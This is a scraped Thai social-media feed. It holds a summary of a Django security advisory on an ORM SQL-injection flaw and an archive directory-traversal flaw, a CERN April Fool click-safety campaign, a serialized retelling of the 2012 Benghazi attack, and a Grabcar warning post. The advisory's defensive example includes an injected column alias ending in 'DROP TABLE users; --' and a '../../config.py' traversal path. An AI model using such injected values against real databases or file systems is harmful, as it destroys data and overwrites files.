    Django ได้ออกแพตช์ในเวอร์ชัน 5.2.7, 5.1.13 และ 4.2.25 รวมถึงสาขา main และ 6.0 alpha โดยแนะนำให้ผู้ใช้ทุกคนอัปเดตทันที และสำหรับผู้ที่ยังไม่สามารถอัปเดตได้ ควรตรวจสอบโค้ดที่ใช้ฟังก์ชันดังกล่าว และหลีกเลี่ยงการใช้ template ที่ไม่ได้รับความไว้วางใจ

    ข้อมูลสำคัญจากข่าว
    Django ออกแพตช์แก้ไขช่องโหว่ CVE-2025-59681 และ CVE-2025-59682
    CVE-2025-59681 เป็นช่องโหว่ SQL Injection ในฟังก์ชัน ORM เช่น annotate(), alias(), aggregate(), extra()
    ช่องโหว่นี้เกิดจากการใช้ dictionary expansion (**kwargs) ที่ไม่ผ่านการตรวจสอบ
    ส่งผลเฉพาะกับฐานข้อมูล MySQL และ MariaDB ไม่กระทบ PostgreSQL หรือ SQLite
    CVE-2025-59682 เป็นช่องโหว่ directory traversal ในฟังก์ชัน extract() ที่ใช้ใน startapp และ startproject
    Django ออกแพตช์ในเวอร์ชัน 5.2.7, 5.1.13, 4.2.25 และสาขา main/6.0 alpha
    แนะนำให้อัปเดตทันที หรือหลีกเลี่ยงการใช้ template ที่ไม่ปลอดภัย

    ข้อมูลเสริมจากภายนอก
    Django ORM เป็นหนึ่งในจุดแข็งของ framework ที่ช่วยป้องกัน SQL injection ได้ดี แต่ช่องโหว่นี้หลุดจากการตรวจสอบ alias
    การใช้ dictionary ที่มี key จาก user input เป็นความเสี่ยงที่พบได้บ่อยในระบบ dynamic query
    Directory traversal เป็นเทคนิคที่ใช้ path เช่น ../ เพื่อเข้าถึงไฟล์นอกโฟลเดอร์เป้าหมาย
    ช่องโหว่ลักษณะนี้สามารถใช้ร่วมกับ template ที่ฝังมัลแวร์เพื่อโจมตีในขั้นตอน setup
    Django มีระบบแจ้งช่องโหว่ผ่านอีเมล security@djangoproject.com เพื่อให้แก้ไขได้รวดเร็ว

    https://securityonline.info/django-security-alert-high-severity-sql-injection-flaw-cve-2025-59681-fixed-in-latest-updates/
    🛡️ “Django ออกแพตช์ด่วน! อุดช่องโหว่ SQL Injection ร้ายแรงใน MySQL/MariaDB พร้อมเตือนภัย Directory Traversal” ทีมพัฒนา Django ได้ออกอัปเดตความปลอดภัยครั้งสำคัญในวันที่ 1 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่สองรายการที่ส่งผลกระทบต่อระบบฐานข้อมูลและการตั้งค่าโปรเจกต์ โดยเฉพาะช่องโหว่ CVE-2025-59681 ซึ่งถูกจัดอยู่ในระดับ “ร้ายแรง” เนื่องจากเปิดทางให้ผู้โจมตีสามารถฝังคำสั่ง SQL ผ่านฟังก์ชันยอดนิยมของ Django ORM ได้แก่ annotate(), alias(), aggregate() และ extra() เมื่อใช้งานร่วมกับฐานข้อมูล MySQL หรือ MariaDB ช่องโหว่นี้เกิดจากการใช้ dictionary expansion (**kwargs) ที่ไม่ผ่านการตรวจสอบอย่างเหมาะสม ทำให้ attacker สามารถส่ง key ที่มีคำสั่ง SQL แฝงเข้าไปเป็น column alias ได้โดยตรง เช่น malicious_alias; DROP TABLE users; -- ซึ่งจะถูกแปลเป็นคำสั่ง SQL และรันทันทีหากระบบไม่มีการป้องกัน อีกหนึ่งช่องโหว่ CVE-2025-59682 แม้จะมีความรุนแรงต่ำกว่า แต่ก็อันตรายไม่น้อย โดยเกิดจากฟังก์ชัน django.utils.archive.extract() ที่ใช้ในการสร้างโปรเจกต์หรือแอปผ่าน template ซึ่งสามารถถูกใช้เพื่อโจมตีแบบ directory traversal ได้ หากไฟล์ใน archive มี path ที่คล้ายกับโฟลเดอร์เป้าหมาย เช่น ../../config.py อาจทำให้ไฟล์สำคัญถูกเขียนทับได้ Django ได้ออกแพตช์ในเวอร์ชัน 5.2.7, 5.1.13 และ 4.2.25 รวมถึงสาขา main และ 6.0 alpha โดยแนะนำให้ผู้ใช้ทุกคนอัปเดตทันที และสำหรับผู้ที่ยังไม่สามารถอัปเดตได้ ควรตรวจสอบโค้ดที่ใช้ฟังก์ชันดังกล่าว และหลีกเลี่ยงการใช้ template ที่ไม่ได้รับความไว้วางใจ ✅ ข้อมูลสำคัญจากข่าว ➡️ Django ออกแพตช์แก้ไขช่องโหว่ CVE-2025-59681 และ CVE-2025-59682 ➡️ CVE-2025-59681 เป็นช่องโหว่ SQL Injection ในฟังก์ชัน ORM เช่น annotate(), alias(), aggregate(), extra() ➡️ ช่องโหว่นี้เกิดจากการใช้ dictionary expansion (**kwargs) ที่ไม่ผ่านการตรวจสอบ ➡️ ส่งผลเฉพาะกับฐานข้อมูล MySQL และ MariaDB ไม่กระทบ PostgreSQL หรือ SQLite ➡️ CVE-2025-59682 เป็นช่องโหว่ directory traversal ในฟังก์ชัน extract() ที่ใช้ใน startapp และ startproject ➡️ Django ออกแพตช์ในเวอร์ชัน 5.2.7, 5.1.13, 4.2.25 และสาขา main/6.0 alpha ➡️ แนะนำให้อัปเดตทันที หรือหลีกเลี่ยงการใช้ template ที่ไม่ปลอดภัย ✅ ข้อมูลเสริมจากภายนอก ➡️ Django ORM เป็นหนึ่งในจุดแข็งของ framework ที่ช่วยป้องกัน SQL injection ได้ดี แต่ช่องโหว่นี้หลุดจากการตรวจสอบ alias ➡️ การใช้ dictionary ที่มี key จาก user input เป็นความเสี่ยงที่พบได้บ่อยในระบบ dynamic query ➡️ Directory traversal เป็นเทคนิคที่ใช้ path เช่น ../ เพื่อเข้าถึงไฟล์นอกโฟลเดอร์เป้าหมาย ➡️ ช่องโหว่ลักษณะนี้สามารถใช้ร่วมกับ template ที่ฝังมัลแวร์เพื่อโจมตีในขั้นตอน setup ➡️ Django มีระบบแจ้งช่องโหว่ผ่านอีเมล security@djangoproject.com เพื่อให้แก้ไขได้รวดเร็ว https://securityonline.info/django-security-alert-high-severity-sql-injection-flaw-cve-2025-59681-fixed-in-latest-updates/
    SECURITYONLINE.INFO
    Django Security Alert: High-Severity SQL Injection Flaw (CVE-2025-59681) Fixed in Latest Updates
    The Django team released urgent updates (v5.2.7, 5.1.13, 4.2.25) to fix a High-severity SQL Injection flaw (CVE-2025-59681) affecting QuerySet methods in MySQL/MariaDB.
    0 Comments 0 Shares 269 Views 0 Reviews
  • CERN เปิดศูนย์พักพิง “เมาส์คอมพิวเตอร์” — แคมเปญสุดขำเพื่อเตือนภัยไซเบอร์ที่จริงจังกว่าที่คิด

    ในโลกที่ภัยไซเบอร์สามารถเกิดขึ้นได้จาก “คลิกเดียว” CERN ได้สร้างแคมเปญสุดแหวกแนวที่ชื่อว่า “CERN Animal Shelter for Computer Mice” หรือ “ศูนย์พักพิงสัตว์สำหรับเมาส์คอมพิวเตอร์” ซึ่งตั้งอยู่จริงบนสนามหญ้าหน้าศูนย์คอมพิวเตอร์ของ CERN โดยมีกรงฟาง อาหาร น้ำ และเมาส์คอมพิวเตอร์หลากรุ่นวางเรียงกันราวกับเป็นสัตว์เลี้ยง

    แนวคิดนี้เริ่มต้นจากการเล่นคำระหว่าง “mouse” ที่หมายถึงทั้งสัตว์และอุปกรณ์คอมพิวเตอร์ โดยมีเป้าหมายเพื่อเตือนผู้ใช้งานว่า “การคลิก” โดยไม่คิดให้ดีอาจนำไปสู่การติดมัลแวร์ การถูกขโมยบัญชี หรือแม้แต่การทำให้ระบบขององค์กรล่มได้ในพริบตา

    CERN จึงรณรงค์ให้ผู้ใช้ “หยุด — คิด — คลิก” และเสนอให้ “นำเมาส์ออกจากเครื่อง” แล้วนำไปพักพิงที่ศูนย์แห่งนี้ เพื่อหลีกเลี่ยงการคลิกโดยไม่ตั้งใจ แม้จะเป็นมุก April Fool แต่ก็สะท้อนความจริงที่ว่า การคลิกลิงก์สุ่มหรือไฟล์แนบที่ไม่รู้ที่มา คือช่องโหว่ที่อันตรายที่สุดในโลกไซเบอร์

    นอกจากนี้ยังมีการแยกแยะว่า “trackpad” ไม่ใช่สัตว์ แต่เป็น “พืช” เพราะไม่เคลื่อนไหว จึงไม่อยู่ในขอบเขตของศูนย์พักพิงนี้ — เป็นการเล่นมุกที่ผสมความรู้ด้านชีววิทยาเข้ากับความปลอดภัยทางไซเบอร์อย่างมีชั้นเชิง

    https://computer-animal-shelter.web.cern.ch/index.shtml
    📰 CERN เปิดศูนย์พักพิง “เมาส์คอมพิวเตอร์” — แคมเปญสุดขำเพื่อเตือนภัยไซเบอร์ที่จริงจังกว่าที่คิด ในโลกที่ภัยไซเบอร์สามารถเกิดขึ้นได้จาก “คลิกเดียว” CERN ได้สร้างแคมเปญสุดแหวกแนวที่ชื่อว่า “CERN Animal Shelter for Computer Mice” หรือ “ศูนย์พักพิงสัตว์สำหรับเมาส์คอมพิวเตอร์” ซึ่งตั้งอยู่จริงบนสนามหญ้าหน้าศูนย์คอมพิวเตอร์ของ CERN โดยมีกรงฟาง อาหาร น้ำ และเมาส์คอมพิวเตอร์หลากรุ่นวางเรียงกันราวกับเป็นสัตว์เลี้ยง แนวคิดนี้เริ่มต้นจากการเล่นคำระหว่าง “mouse” ที่หมายถึงทั้งสัตว์และอุปกรณ์คอมพิวเตอร์ โดยมีเป้าหมายเพื่อเตือนผู้ใช้งานว่า “การคลิก” โดยไม่คิดให้ดีอาจนำไปสู่การติดมัลแวร์ การถูกขโมยบัญชี หรือแม้แต่การทำให้ระบบขององค์กรล่มได้ในพริบตา CERN จึงรณรงค์ให้ผู้ใช้ “หยุด — คิด — คลิก” และเสนอให้ “นำเมาส์ออกจากเครื่อง” แล้วนำไปพักพิงที่ศูนย์แห่งนี้ เพื่อหลีกเลี่ยงการคลิกโดยไม่ตั้งใจ แม้จะเป็นมุก April Fool แต่ก็สะท้อนความจริงที่ว่า การคลิกลิงก์สุ่มหรือไฟล์แนบที่ไม่รู้ที่มา คือช่องโหว่ที่อันตรายที่สุดในโลกไซเบอร์ นอกจากนี้ยังมีการแยกแยะว่า “trackpad” ไม่ใช่สัตว์ แต่เป็น “พืช” เพราะไม่เคลื่อนไหว จึงไม่อยู่ในขอบเขตของศูนย์พักพิงนี้ — เป็นการเล่นมุกที่ผสมความรู้ด้านชีววิทยาเข้ากับความปลอดภัยทางไซเบอร์อย่างมีชั้นเชิง https://computer-animal-shelter.web.cern.ch/index.shtml
    0 Comments 0 Shares 276 Views 0 Reviews
  • Château Christophe ตอนที่ 5
    นิทานเรื่อง “Château Christophe”
    ตอนที่ 5
    เมื่อความมืดเริ่มเข้ามาปกคลุ มสถานกงสุลที่ Benghazi ในวันที่ 11 กันยายน ค.ศ. 2012 Sean Smith ผู้เชี่ยวชาญด้านการข่าว ยังนั่งเล่นเกมส์ Eve Online อยู่หน้าจอ เขาอายุ 34 ปี มาจากกองทัพอากาศและอยู่กระทรวงการต่างประเทศมากว่า 10 ปีแล้ว เมียและลูก 2 คน อยู่ที่ประเทศ Netherlands เขาเป็นคนที่เล่นเกมส์ Eve นี้อย่างติดพันโดยใช้ชื่อว่า vile_rat เขาพิมพ์ถึงคู่เล่นเขา6 นาที ก่อน 2 ทุ่ม ว่า “สมมุติว่าเรารอดตายจากคืนนี้” มันดูเป็นตลกโหด แต่ Smith ผ่านสถานการณ์หนักกว่า Benghazi มาเยอะแล้ว เขาพิมพ์ข้อความเพิ่ม “เราเห็นตำรวจคนหนึ่งที่ดูแลบริเวณ กำลังถ่ายรูป”
เขาคงจะหมายความถึง ชาวลิเบียพวกที่เดินตรวจการณ์อยู่รอบบริเวณกงสุล แต่ยังมีการ์ดอีก 9 คน อยู่ในบริเวณกงสุล 5 คนเป็นคนอเมริกันติดอาวุธพร้อม และอีก 4 คน เป็นทหารชาวลิเบียจากหน่วย 17th of February Martyrs Brigade เป็นทหารพวกเดียวกับที่ดูแล Stevens เมื่อเขามาอยู่ที่ Benghazi ในตอนแรก
    สองชั่วโมงต่อมา เวลา 9.40 น. vile_rat พิมพ์ว่า “ฉิบหายแล้ว เสียงปืนยิง” แล้วเขาก็เลิกติดต่อไป
    จากรายงานของเจ้าหน้าที่อาวุโสของกระทรวงการต่างประเทศ ระบุว่า เจ้าหน้าที่ดูแลความปลอดภัยเห็นจากจอที่ monitor ประตูหน้ากงสุลว่ามีกลุ่มคนจำนวนมากติดอาวุธกำลังบุกเข้ามา เป็นคนกลุ่มใหญ่มากจนนับไม่ไหว เขากดปุ่มเตือนภัย คว้าไมค์แล้วตะโกนว่า “ถูกโจมตี ! ถูกโจมตี !”
    เจ้าหน้าที่ดูแลด้านความปลอดภัยอีก 4 คนอยู่ในเรือนใหญ่กับ Stevens และ Smith คนหนึ่งรีบพา Stevens และ Smith เข้าไปที่ส่วนหลังของตึกและปลดแผงเหล็กปิดตึกในส่วนที่เป็นห้องนิรภัย เจ้าหน้าที่อีก 3 คน กระโดดไปคว้าปืนออโตเมติกและเสื้อเกราะ เจ้าหน้าที่ที่อยู่กับ Stevens และ Smith พูดวิทยุบอกว่าพวกเขาปลอดภัยดีและอยู่ในห้องนิรภัย
    ซุ้มทหารด้านหน้าใกล้ประตูทางเข้าเริ่มถูกไฟเผา และผู้โจมตีได้กระจายตัวไปรอบ ๆ บริเวณ พวกเขาพังประตูหน้าเข้ามาได้ และพยายามทำลายล็อคแผ่นเหล็กเพื่อเข้ามายังส่วนใน แต่ทำลายไม่สำเร็จ ฝ่ายเจ้าหน้าที่ของสถานกงสุลซุ่มเงียบอยู่ใต้เงามืด เตรียมพร้อมที่จะยิงถ้ามีใครบุกรุกเข้ามาในห้องนิรภัย แต่ไม่มีใครบุกรุกเข้ามา พวกจู่โจมกลับเอาน้ำมันดีเซลจากซุ้มทหารมาเทราดพื้นและเครื่องเรือน แล้วจุดไฟ หลังจากนั้นทั้งเรือนก็มีแต่ไฟลุกโชน
    ควันไฟผสมน้ำมันผสมเครื่องเรือนที่เริ่มละลาย เริ่มฟุ้งกระจายไปทั่วบริเวณกงสุล ทำให้พวกที่ซ่อนตัวเองอยู่ข้างในเริ่มสำลักควัน Stevens, Smith และผู้คุ้มกันย้ายไปที่ห้องน้ำ พยายามไปที่หน้าต่างที่มีลูกกรงติดอยู่ ควันเริ่มเป็นหมอกสีดำ พวกเขานอนลงกับพื้นพยายามสูดอากาศที่ยังมีหลงเหลืออยู่ในตึก ในที่สุดพวกเขาก็ตัดสินใจที่จะออกมานอกห้องนิรภัย จึงคลานมาที่ห้องนอนซึ่งมีหน้าต่างที่สามารถเปิดจากในห้องได้
    เจ้าหน้าที่คุ้มกันเริ่มหายใจไม่ออก และมองเห็นไม่ชัดเจนจากควันไฟ เขาพยายามกระโดดออกไปที่ระเบียง โดยเอากระสอบทรายคลุมตัว ยังไม่ทันไรเขาก็เจอไฟไหม้ทั้งตัว และพวกจู่โจมก็โหมยิงใส่เขานับไม่ถ้วน พวกจู่โจมมีเป็นสิบๆคน ทั้ง Stevens และ Smith ไม่ได้ตามเจ้าหน้าที่คุ้มกันไปที่หน้าต่าง เจ้าหน้าที่จึงปืนย้อนกลับมาหาทั้งสองคนใหม่ เขาหาทั้งสองคนไม่เจอ เขากลับออกไปใหม่เพื่อสูดอากาศบริสุทธิ์ เขาปีนเข้าปีนออกอยู่หลายรอบ ก็ยังหาทั้งสองคนไม่เจอ คอและปอดเขาแสบไปหมด เขาพยายามปีนบันไดขึ้นไปบนหลังคา และก็หมดสติไปหลังจากที่วิทยุเรียกเจ้าหน้าที่คนอื่นให้มาช่วย
    เจ้าหน้าที่อเมริกันอีก 4 คน ฟังเสียงพูดทางวิทยุเกือบไม่รู้เรื่อง ขณะเดียวกันพวกจู่โจมก็บุกเข้ามาในตึก B ตึกเล็กที่อยู่ในบริเวณ แต่ไม่สามารถฝ่าแท่งกั้นเข้ามายังด้านในของห้องได้ และก็ไม่สามารถผ่านเข้ามาในศูนย์ปฏิบัติการกลางได้
    ที่ตึก B และศูนย์ปฏิบัติการกลางดูเหมือนจะไม่มีโทรศัพท์สายตรง แต่พวกเขามองเห็นควันดำลอยขึ้นมา พวกเขาคิดว่าจะต้องไปที่ห้องนิรภัยของตึกกลางให้ได้ เจ้าหน้าที่คนหนึ่งพยายามเปิดประตูตึกกลาง โดยการโยนระเบิดใส่พวกจู่โจมเพื่อเปิดทาง เขากลับเข้ามาที่ตึก B ใหม่ รวมตัวกับอีก 2 คน แล้วทั้ง 3 ก็ไปที่รถ SUV หุ้มเกราะค่อยๆขับมาที่ตึกกลาง 2 คนพยายามยิงตรึงพวกจู่โจม ขณะที่อีก 1 คนพยายามเข้าไปที่ตึกกลาง เขาควานหา Stevens และ Smith และเมื่อควันหนาขึ้นเขาก็คลานออกมา เขาทำอยู่อย่างนี้จนหมดสภาพ เจ้าหน้าที่อีกคนเข้าไปแทน และก็อีกคน คนหนึ่งเจอ Smith และลากออกมา ปรากฏว่า Smith เสียชีวิตแล้วจากควันไฟ แต่พวกเขาก็ยังหา Stevens ยังไม่เจอ
    หน่วยกำลังเสริมมาถึง (ในรายงานไม่ได้ระบุว่ามาถึงเวลาใด) เจ้าหน้าที่อเมริกัน 6 คน จากหน่วยประจำการที่อยู่ห่างไปประมาณ 1 ไมล์ มาพร้อมด้วยทหารอีก 16 คนจากหน่วยที่ 17th February Martyrs Brigade พวกเขาเข้ามาช่วยเจ้าหน้าที่ที่เหลืออยู่ 1 คน ในศูนย์ปฏิบัติการกลาง ซึ่งพยายามโทรศัพท์เรียกหน่วยเสริมจากทุกแห่งรวมทั้งจาก Tripoli หลังจากนั้นพวกเขารวมตัวกันที่ประตูหน้าและจัดการหาตัว Stevens ใหม่อีกรอบ แต่ก็ยังไม่พบ พวกอเมริกันและทหารลิเบียที่เป็นฝ่ายเดียวกันพยายามจะรักษากงสุลไว้ แต่ไม่สำเร็จ ในที่สุดพวกเขาจำเป็นต้องทิ้งกงสุลและอพยพออกไป เจ้าหน้าที่อัดตัวรวมกันอยู่ในรถ SUV พร้อมด้วยร่างของ Smith
    พวกอเมริกันที่หลบหนีออกมาโดนทั้งไฟเผาและถูกยิง พวกเขาพยายามฝ่าดงกระสุนออกมาจากบริเวณกงสุล รถวิ่งไปตามถนนเพื่อไปยังหน่วยเสริมกำลังของอเมริกัน ระหว่างทางพวกเขายังโดนไล่ยิงและปาระเบิดใส่ ในที่สุดพวกเขาก็มาถึงหน่วยเสริมกำลังจนได้ พวกเขาเข้าประจำที่และยิงต่อสู้กับพวกจู่โจมต่อ เช้ามืดกองกำลังอเมริกันจาก Tripoli บินมาสมทบ การต่อสู้ยังดำเนินต่อไป พวกอเมริกันเจ็บและตายเพิ่มขึ้น (ในจำนวนผู้ตาย มีเจ้าหน้าที่ CIA อีก 2 คน ชื่อ Tyrone S. Woods และ Glen Doherty เจ้าหน้าที่ Woods คือ คนที่อยู่กับฑูต Stevens ในห้องนิรภัยตอนแรก) ในที่สุดพวกเขาตัดสินใจหนีออกไปจากเมือง พวกเขาได้จัดขบวนรถ SUV วิ่งไปทางสนามบินโดยความช่วยเหลือของทหารลิเบียที่เป็นพวก ในที่สุดก็ขึ้นเครื่องบิน 2 ลำ ออกมาได้หมดตอนเช้ามืดของวันนั้น
    ในที่สุดไฟที่สถานกงสุลก็เริ่มมอด พวกจู่โจมหายไปหมด ชาวลิเบียซึ่งอาจจะเป็นพวกที่ตั้งใจเข้าไปขโมยของ หรือเป็นพวกอยากรู้อยากเห็น พาตัวเข้าไปที่ห้องนิรภัยจนได้ และพวกเขาก็พบ Stevens พวกเขาลากร่าง Stevens ออกมา แบกไปขึ้นรถและนำไปส่งโรงพยาบาล
    แพทย์ฉุกเฉินพยายามช่วยกู้ชีวิต Stevens อยู่ประมาณ 45 นาที แต่ไม่สำเร็จ และไม่สามารถบอกได้ว่าชายคนนี้เป็นใคร เขาเจอมือถือที่กระเป๋าของ Stevens จึงเรียกหมายเลขต่างๆ ซึ่งกลายเป็นการพูดโทรศัพท์ที่ประวัติศาสตร์ต้องจารึก
    คนเล่านิทาน
7 มิย. 57
    Château Christophe ตอนที่ 5 นิทานเรื่อง “Château Christophe” ตอนที่ 5 เมื่อความมืดเริ่มเข้ามาปกคลุ มสถานกงสุลที่ Benghazi ในวันที่ 11 กันยายน ค.ศ. 2012 Sean Smith ผู้เชี่ยวชาญด้านการข่าว ยังนั่งเล่นเกมส์ Eve Online อยู่หน้าจอ เขาอายุ 34 ปี มาจากกองทัพอากาศและอยู่กระทรวงการต่างประเทศมากว่า 10 ปีแล้ว เมียและลูก 2 คน อยู่ที่ประเทศ Netherlands เขาเป็นคนที่เล่นเกมส์ Eve นี้อย่างติดพันโดยใช้ชื่อว่า vile_rat เขาพิมพ์ถึงคู่เล่นเขา6 นาที ก่อน 2 ทุ่ม ว่า “สมมุติว่าเรารอดตายจากคืนนี้” มันดูเป็นตลกโหด แต่ Smith ผ่านสถานการณ์หนักกว่า Benghazi มาเยอะแล้ว เขาพิมพ์ข้อความเพิ่ม “เราเห็นตำรวจคนหนึ่งที่ดูแลบริเวณ กำลังถ่ายรูป”
เขาคงจะหมายความถึง ชาวลิเบียพวกที่เดินตรวจการณ์อยู่รอบบริเวณกงสุล แต่ยังมีการ์ดอีก 9 คน อยู่ในบริเวณกงสุล 5 คนเป็นคนอเมริกันติดอาวุธพร้อม และอีก 4 คน เป็นทหารชาวลิเบียจากหน่วย 17th of February Martyrs Brigade เป็นทหารพวกเดียวกับที่ดูแล Stevens เมื่อเขามาอยู่ที่ Benghazi ในตอนแรก สองชั่วโมงต่อมา เวลา 9.40 น. vile_rat พิมพ์ว่า “ฉิบหายแล้ว เสียงปืนยิง” แล้วเขาก็เลิกติดต่อไป จากรายงานของเจ้าหน้าที่อาวุโสของกระทรวงการต่างประเทศ ระบุว่า เจ้าหน้าที่ดูแลความปลอดภัยเห็นจากจอที่ monitor ประตูหน้ากงสุลว่ามีกลุ่มคนจำนวนมากติดอาวุธกำลังบุกเข้ามา เป็นคนกลุ่มใหญ่มากจนนับไม่ไหว เขากดปุ่มเตือนภัย คว้าไมค์แล้วตะโกนว่า “ถูกโจมตี ! ถูกโจมตี !” เจ้าหน้าที่ดูแลด้านความปลอดภัยอีก 4 คนอยู่ในเรือนใหญ่กับ Stevens และ Smith คนหนึ่งรีบพา Stevens และ Smith เข้าไปที่ส่วนหลังของตึกและปลดแผงเหล็กปิดตึกในส่วนที่เป็นห้องนิรภัย เจ้าหน้าที่อีก 3 คน กระโดดไปคว้าปืนออโตเมติกและเสื้อเกราะ เจ้าหน้าที่ที่อยู่กับ Stevens และ Smith พูดวิทยุบอกว่าพวกเขาปลอดภัยดีและอยู่ในห้องนิรภัย ซุ้มทหารด้านหน้าใกล้ประตูทางเข้าเริ่มถูกไฟเผา และผู้โจมตีได้กระจายตัวไปรอบ ๆ บริเวณ พวกเขาพังประตูหน้าเข้ามาได้ และพยายามทำลายล็อคแผ่นเหล็กเพื่อเข้ามายังส่วนใน แต่ทำลายไม่สำเร็จ ฝ่ายเจ้าหน้าที่ของสถานกงสุลซุ่มเงียบอยู่ใต้เงามืด เตรียมพร้อมที่จะยิงถ้ามีใครบุกรุกเข้ามาในห้องนิรภัย แต่ไม่มีใครบุกรุกเข้ามา พวกจู่โจมกลับเอาน้ำมันดีเซลจากซุ้มทหารมาเทราดพื้นและเครื่องเรือน แล้วจุดไฟ หลังจากนั้นทั้งเรือนก็มีแต่ไฟลุกโชน ควันไฟผสมน้ำมันผสมเครื่องเรือนที่เริ่มละลาย เริ่มฟุ้งกระจายไปทั่วบริเวณกงสุล ทำให้พวกที่ซ่อนตัวเองอยู่ข้างในเริ่มสำลักควัน Stevens, Smith และผู้คุ้มกันย้ายไปที่ห้องน้ำ พยายามไปที่หน้าต่างที่มีลูกกรงติดอยู่ ควันเริ่มเป็นหมอกสีดำ พวกเขานอนลงกับพื้นพยายามสูดอากาศที่ยังมีหลงเหลืออยู่ในตึก ในที่สุดพวกเขาก็ตัดสินใจที่จะออกมานอกห้องนิรภัย จึงคลานมาที่ห้องนอนซึ่งมีหน้าต่างที่สามารถเปิดจากในห้องได้ เจ้าหน้าที่คุ้มกันเริ่มหายใจไม่ออก และมองเห็นไม่ชัดเจนจากควันไฟ เขาพยายามกระโดดออกไปที่ระเบียง โดยเอากระสอบทรายคลุมตัว ยังไม่ทันไรเขาก็เจอไฟไหม้ทั้งตัว และพวกจู่โจมก็โหมยิงใส่เขานับไม่ถ้วน พวกจู่โจมมีเป็นสิบๆคน ทั้ง Stevens และ Smith ไม่ได้ตามเจ้าหน้าที่คุ้มกันไปที่หน้าต่าง เจ้าหน้าที่จึงปืนย้อนกลับมาหาทั้งสองคนใหม่ เขาหาทั้งสองคนไม่เจอ เขากลับออกไปใหม่เพื่อสูดอากาศบริสุทธิ์ เขาปีนเข้าปีนออกอยู่หลายรอบ ก็ยังหาทั้งสองคนไม่เจอ คอและปอดเขาแสบไปหมด เขาพยายามปีนบันไดขึ้นไปบนหลังคา และก็หมดสติไปหลังจากที่วิทยุเรียกเจ้าหน้าที่คนอื่นให้มาช่วย เจ้าหน้าที่อเมริกันอีก 4 คน ฟังเสียงพูดทางวิทยุเกือบไม่รู้เรื่อง ขณะเดียวกันพวกจู่โจมก็บุกเข้ามาในตึก B ตึกเล็กที่อยู่ในบริเวณ แต่ไม่สามารถฝ่าแท่งกั้นเข้ามายังด้านในของห้องได้ และก็ไม่สามารถผ่านเข้ามาในศูนย์ปฏิบัติการกลางได้ ที่ตึก B และศูนย์ปฏิบัติการกลางดูเหมือนจะไม่มีโทรศัพท์สายตรง แต่พวกเขามองเห็นควันดำลอยขึ้นมา พวกเขาคิดว่าจะต้องไปที่ห้องนิรภัยของตึกกลางให้ได้ เจ้าหน้าที่คนหนึ่งพยายามเปิดประตูตึกกลาง โดยการโยนระเบิดใส่พวกจู่โจมเพื่อเปิดทาง เขากลับเข้ามาที่ตึก B ใหม่ รวมตัวกับอีก 2 คน แล้วทั้ง 3 ก็ไปที่รถ SUV หุ้มเกราะค่อยๆขับมาที่ตึกกลาง 2 คนพยายามยิงตรึงพวกจู่โจม ขณะที่อีก 1 คนพยายามเข้าไปที่ตึกกลาง เขาควานหา Stevens และ Smith และเมื่อควันหนาขึ้นเขาก็คลานออกมา เขาทำอยู่อย่างนี้จนหมดสภาพ เจ้าหน้าที่อีกคนเข้าไปแทน และก็อีกคน คนหนึ่งเจอ Smith และลากออกมา ปรากฏว่า Smith เสียชีวิตแล้วจากควันไฟ แต่พวกเขาก็ยังหา Stevens ยังไม่เจอ หน่วยกำลังเสริมมาถึง (ในรายงานไม่ได้ระบุว่ามาถึงเวลาใด) เจ้าหน้าที่อเมริกัน 6 คน จากหน่วยประจำการที่อยู่ห่างไปประมาณ 1 ไมล์ มาพร้อมด้วยทหารอีก 16 คนจากหน่วยที่ 17th February Martyrs Brigade พวกเขาเข้ามาช่วยเจ้าหน้าที่ที่เหลืออยู่ 1 คน ในศูนย์ปฏิบัติการกลาง ซึ่งพยายามโทรศัพท์เรียกหน่วยเสริมจากทุกแห่งรวมทั้งจาก Tripoli หลังจากนั้นพวกเขารวมตัวกันที่ประตูหน้าและจัดการหาตัว Stevens ใหม่อีกรอบ แต่ก็ยังไม่พบ พวกอเมริกันและทหารลิเบียที่เป็นฝ่ายเดียวกันพยายามจะรักษากงสุลไว้ แต่ไม่สำเร็จ ในที่สุดพวกเขาจำเป็นต้องทิ้งกงสุลและอพยพออกไป เจ้าหน้าที่อัดตัวรวมกันอยู่ในรถ SUV พร้อมด้วยร่างของ Smith พวกอเมริกันที่หลบหนีออกมาโดนทั้งไฟเผาและถูกยิง พวกเขาพยายามฝ่าดงกระสุนออกมาจากบริเวณกงสุล รถวิ่งไปตามถนนเพื่อไปยังหน่วยเสริมกำลังของอเมริกัน ระหว่างทางพวกเขายังโดนไล่ยิงและปาระเบิดใส่ ในที่สุดพวกเขาก็มาถึงหน่วยเสริมกำลังจนได้ พวกเขาเข้าประจำที่และยิงต่อสู้กับพวกจู่โจมต่อ เช้ามืดกองกำลังอเมริกันจาก Tripoli บินมาสมทบ การต่อสู้ยังดำเนินต่อไป พวกอเมริกันเจ็บและตายเพิ่มขึ้น (ในจำนวนผู้ตาย มีเจ้าหน้าที่ CIA อีก 2 คน ชื่อ Tyrone S. Woods และ Glen Doherty เจ้าหน้าที่ Woods คือ คนที่อยู่กับฑูต Stevens ในห้องนิรภัยตอนแรก) ในที่สุดพวกเขาตัดสินใจหนีออกไปจากเมือง พวกเขาได้จัดขบวนรถ SUV วิ่งไปทางสนามบินโดยความช่วยเหลือของทหารลิเบียที่เป็นพวก ในที่สุดก็ขึ้นเครื่องบิน 2 ลำ ออกมาได้หมดตอนเช้ามืดของวันนั้น ในที่สุดไฟที่สถานกงสุลก็เริ่มมอด พวกจู่โจมหายไปหมด ชาวลิเบียซึ่งอาจจะเป็นพวกที่ตั้งใจเข้าไปขโมยของ หรือเป็นพวกอยากรู้อยากเห็น พาตัวเข้าไปที่ห้องนิรภัยจนได้ และพวกเขาก็พบ Stevens พวกเขาลากร่าง Stevens ออกมา แบกไปขึ้นรถและนำไปส่งโรงพยาบาล แพทย์ฉุกเฉินพยายามช่วยกู้ชีวิต Stevens อยู่ประมาณ 45 นาที แต่ไม่สำเร็จ และไม่สามารถบอกได้ว่าชายคนนี้เป็นใคร เขาเจอมือถือที่กระเป๋าของ Stevens จึงเรียกหมายเลขต่างๆ ซึ่งกลายเป็นการพูดโทรศัพท์ที่ประวัติศาสตร์ต้องจารึก คนเล่านิทาน
7 มิย. 57
    0 Comments 0 Shares 447 Views 0 Reviews
  • Grabcarสาวสวย เล่าระทึกอุทาหรณ์เกือบถูก "ลวง" ไป "...ายตัว" (15/9/68)

    #Grabcar
    #ภัยใกล้ตัว
    #เรื่องจริงเตือนภัย
    #สาวไทยต้องระวัง
    #ข่าววันนี้
    #News1short
    #ThaiTimes
    #TruthFromThailand
